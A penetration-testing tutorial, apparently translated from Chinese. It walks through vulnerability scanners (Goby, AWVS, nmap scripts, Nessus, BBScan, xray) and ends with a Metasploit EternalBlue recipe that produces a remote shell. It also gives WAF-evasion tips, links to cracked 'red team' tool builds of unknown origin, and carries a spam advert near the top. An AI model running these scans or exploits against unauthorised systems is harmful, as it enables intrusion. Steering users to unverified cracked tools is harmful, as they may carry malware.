Vulnerability Scan
Super low price nisp registration (the second level is more than a thousand less than the official website), you can add your own v: zjhululu
1. Goby + AWVS vulnerability scanning
Introduction to goby and AWVS
Goby is the most comprehensive tool for sorting out target enterprises. Isomorphic goby can clearly scan the open ports of IP addresses and the services corresponding to the ports. At the same time, it will conduct practical tests based on the open ports and applications, regardless of others. of low- to medium-risk vulnerabilities, but what I care more about is the vulnerability that can directly get the shell.
AWVS is a lightweight vulnerability scanning tool for the web. That is, based on the scanned address we provide, we can quickly scan out all its vulnerabilities, including vulnerabilities such as high, medium, low, and information leakage.
Foreplay
Download goby and awvs (It is recommended to download the red team special edition, which is more powerful) Goby downloads the awvs plug-in Add awvs api to goby downloadnpcap
Red team special edition goby download link: https://pan.baidu.com/s/1hkUDJzz8iT_WAngV1K-pXw?pwd=8hgd
Extraction code: 8hgd
Enter IP or domain name in goby to start scanning
Generally, the subdomain name is exploded directly and all are added directly.
After scanning, click [Web Detection] on the right
View the vulnerabilities scanned by goby directly on the left side
In fact, this is usually enough
Click the awvs button
The awvs page shows that it is scanning
goby page generation template
awvs bypass waf
WAF can be bypassed by modifying the scanning speed and modifying the user-agent header
2. nmap
Need to update namp frequently:
windows: https://nmap.org/download.html#windows
kali: execute the command sudo apt-get install nmap
Download vulscan
windows:
Visit https://github.com/scipag/vulscan, download and put it into Nmap\scripts\vulscan*
linux:
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s pwd/scipag_vulscan /usr/share/nmap/scripts/vulscan
You can also download it to windows and transfer it to kali/usr/share/nmap/scripts/
Update vulnerability library:
Download the following files and put them in the /vulscan/ folder
https://www.computec.ch/projekte/vulscan/download/cve.csv https://www.computec.ch/projekte/vulscan/download/exploitdb.csv https://www.computec.ch/projekte/vulscan/download/openvas.csv https://www.computec.ch/projekte/vulscan/download/osvdb.csv https://www.computec.ch/projekte/vulscan/download/scipvuldb.csv https://www.computec.ch/projekte/vulscan/download/securityfocus.csv https://www.computec.ch/projekte/vulscan/download/securitytracker.csv https://www.computec.ch/projekte/vulscan/download/xforce.csv
Download nmap-vulners
windows:
Visit https://github.com/vulnersCom/nmap-vulners, download and put it into nmap\scripts\
map-vulners*
linux:
cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
You can also download it to windows and transfer it to kali/usr/share/nmap/scripts/
Run and use
Use vulscan to scan (recommended): nmap -sV --script=vulscan/vulscan.nse 192.168.242.137
(It seems that there are more windows)
Scan using nmap-vulners: nmap -sV --script=nmap-vulners/vulners.nse 192.168.242.137
3. Nessus
Download reference link:
windows: https://www.cnblogs.com/wuchangsoft/p/17055111.html (after looking for nearly four days, I feel this is the best one)
Linux and all detailed instructions for use: https://blog.csdn.net/wwl012345/article/details/96998187
And: https://blog.csdn.net/Innocence_0/article/details/131654450
Mainly the following three steps
Remember a problem encountered: the browser cannot be opened
Solution: Adjust the keyboard to English input state, click the refresh button in the page to refresh the page, then click anywhere on the current page with the mouse, and then use the keyboard to directly enter: thisisunsafe on the current page (not enter in the address bar) , just hit the keyboard directly).
use:
New Scan
Basic Network Scan
Basic Network Scan is a simple scan, and this is usually enough.
Advanced Scan configures the scan without using any recommendations.
Configure basic information settings
Configure account password
If the website has an account and password, you need to configure Credentials
Select plug-ins
save
Click”>”Scan
4. BBScan
First download BBScan2 through GitHub
Installation library: pip install -r requirements.txt
Scan a single target: python BBScan.py --host [url]
Import target from file: python BBScan.py -f urls.txt
parameter:
Targets:
--host [HOST [HOST ...]]
Scan several hosts from command line
-f TargetFile Load new line delimited targets from TargetFile
-d TargetDirectory Load all *.txt files from TargetDirectory
--crawler CrawlDirectory
Load all *.log crawl files from CrawlDirectory
--network MASK Scan all Target/MASK neighbor hosts,
should be an integer between 8 and 31
HTTP SCAN:
--rule [RuleFileName [RuleFileName ...]]
Import specified rule files only.
-n, --no-crawl No crawling, sub folders will not be processed
-nn, --no-check404 No HTTP 404 existence check
--full Process all sub directories
Scripts SCAN:
--scripts-only Scan with user scripts only
--script [ScriptName [ScriptName ...]]
Execute specified scripts only
--no-scripts Disable all scripts
CONCURRENT:
-p PROCESS Num of processes running concurrently, 30 by default
-t THREADS Num of scan threads for each scan process, 3 by default
OTHER:
--proxy Proxy Set HTTP proxy server
--timeout Timeout Max scan minutes for each target, 10 by default
-md Save scan report as markdown format
--save-ports PortsDataFile
Save open ports to PortsDataFile
--debug Show verbose debug info
-nnn, --no-browser Do not open web browser to view report
-v show program's version number and exit
5.xray
Tool download address
All tools: https://pan.quark.cn/s/c54897469b01 (not using Baidu speed-limited cloud disk)
You can also search by yourself. (It seems that the cracking tool can only be used for xray1.3.3)
Use
Download it, double-click xray_windows_amd64.exe, and then run .\xray_windows_amd64.exe genca in powershell to generate the certificate
Import the certificate into Firefox and configure the proxy, 127.0.0.1:7777
When using in windows, use administrator mode to run cmd, or use powershell.
Commonly used:
Passive scanning using HTTP proxy:xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output ming.html
other:
Use basic crawler vulnerability scanning:xray_windows_amd64.exe webscan --basic-crawler http://example.com --html-output xxx.html
Quickly test a single url, no crawlers:xray_windows_amd64.exe webscan --url http://example.com/?a=b --html-output single-url.html
in:
If the specified module is not selected, xray scans all by default.
–html output in html: format
ming.html: Output web page
You can also use the graphical page directly: super-xray-1.7-system-jre
Linked with burp
bp configuration:
On the basis of regular packet capture, burp configures a downstream agent. Send the traffic capture to xray for scanning.
Here bp captures the traffic and sends it to port 7777 of the local machine.
Point! ! ! !
You must uncheck “Set “Connection close” on incoming requests when using HTTP/1″ in burp, otherwise burp will automatically modify the content of the connection in neighbors
Then turn on xray
Linked with rad
Attached is a rad download address: https://github.com/chaitin/rad/releases
(It is also available in the network disk above)
rad is also a directory crawling tool developed by Changting Technology. Because Xray’s automated crawling function is not good, it can be combined with rad for more efficient automatic crawling. Note that rad only crawls the target directory, not the subdomain! !
(1) Monitoring a single domain name:
First xary turns on proxy monitoring:
xray_windows_amd64.exe webscan –listen 127.0.0.1:7777 –html-output proxy.html
rad crawls the target:
rad_windows_amd64.exe -t http://example.com -http-proxy 127.0.0.1:7777
In this way, the results of rad crawling will be automatically transferred to xray for scanning.
(2) Use a script to monitor multiple domain names:
Use: python 1.py -r a.txt -o b.txt (-r is the domain name, -o is the output)
import argparse
import time
parser = argparse.ArgumentParser()
txtName = str(int(time.time())) + ".txt"
parser.add_argument('-r',help='Enter the file you want to generate')
parser.add_argument('-o', type=str, default=txtName, help='Please enter the name of the file you want to output. Default is ' + txtName)
args = parser.parse_args()
f = open(args.r,'r')
data = f.readlines()
a = ""
for i in data:
a + = "; .\rad_windows_amd64.exe -t {} --json abs.json --index".format(i.strip())
f.close()
f = open(args.o,"w")
f.write(a)
f.close()
In the same way, xray, rad and burp can even be linked, but I won’t try it here.
Exploitation
MSF (Metasploit Framework)
MSF is a vulnerability exploitation and attack program that comes with Kali and contains three major modules:
msfconsole: the most commonly used exploit module msweb: is the graphical interface of MSF msfupdate: used for MSF update, it is recommended to update before use
(Take Eternal Blue as an example):
Run:msfconsole
Search for vulnerabilities: search ms17-010
Exploit:use exploit/windows/smb/ms17_010_eternalblue
View the required payload:show options
Set payload: set RHOSTS 192.168.242.137
Start the attack: run
Rebound shell: shell
Direct browser search
Such as CVE-2008-4250
View vulnerability disclosure platform
https://www.cnvd.org.cn/ https://www.seebug.org/ https://fr.0day.today/ https://www.exploit-db.com/ https://packetstormsecurity.com/
etc. . .